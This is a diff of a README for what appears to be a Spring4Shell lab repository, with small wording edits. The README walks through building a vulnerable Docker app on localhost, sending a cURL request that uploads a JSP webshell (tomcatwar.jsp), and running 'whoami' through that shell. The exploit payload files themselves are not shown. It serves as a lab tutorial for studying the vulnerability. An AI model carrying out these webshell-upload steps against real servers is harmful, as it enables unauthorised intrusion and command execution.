queencitycyber/Spring4Shell-cURL/README.md

 docker image build -t retro/stupidrumor . && docker container run -it --publish 8080:8080 retro/stupidrumor
 ```

 3. Use cURL to upload your WAR.
 The following command will read from the local `requests.txt` file.
-The `request.txt` contains request configurations we want cURL to use, namely the specific headers we need to exploit the vulnerable application.
-You'll notice the last line `data-binary = "@body.txt"` too, which is our POST body:
+It contains request configurations we want cURL to use, namely the specific headers we need to prime the application for exploitation.
+You'll notice the last line `data-binary = "@body.txt"` too, which is the local file containing our POST body:

 ```
 curl --config request.txt http://localhost:8080/stupidRumor_war/index
 ```

 **Note:** I've included proxy support within the cURL configs, so we can send our requests through a transparent application proxy (Burp).
-This happens over port 8081, so make sure to adjust your proxy details as necessary.
+This happens over port 8081, so make sure to adjust accordingly.
 This is mostly for troubleshooting, but handy to have in your Repeater nonetheless :)

-4. Once the cURL command is sent, the webshell (`tomcatwar.jsp`) will be uploaded to the webroot (`stupidRumor_war/`), which means you can access it here in a browser if you want: `stupidRumor_war/tomcatwar.jsp?`
+4. Once the cURL command is sent, the webshell `tomcatwar.jsp` will be uploaded to the webroot at `stupidRumor_war/`.
+If you want, you can access the shell in a browser.

-5. But we're using cURL, so now issue the second cURL request:
+5. But we're using cURL, so issue the second request to run your commands:

 ```
 curl 'http://localhost:8080/stupidRumor_war/tomcatwar.jsp?pwd=j&cmd=whoami' --output -
 ```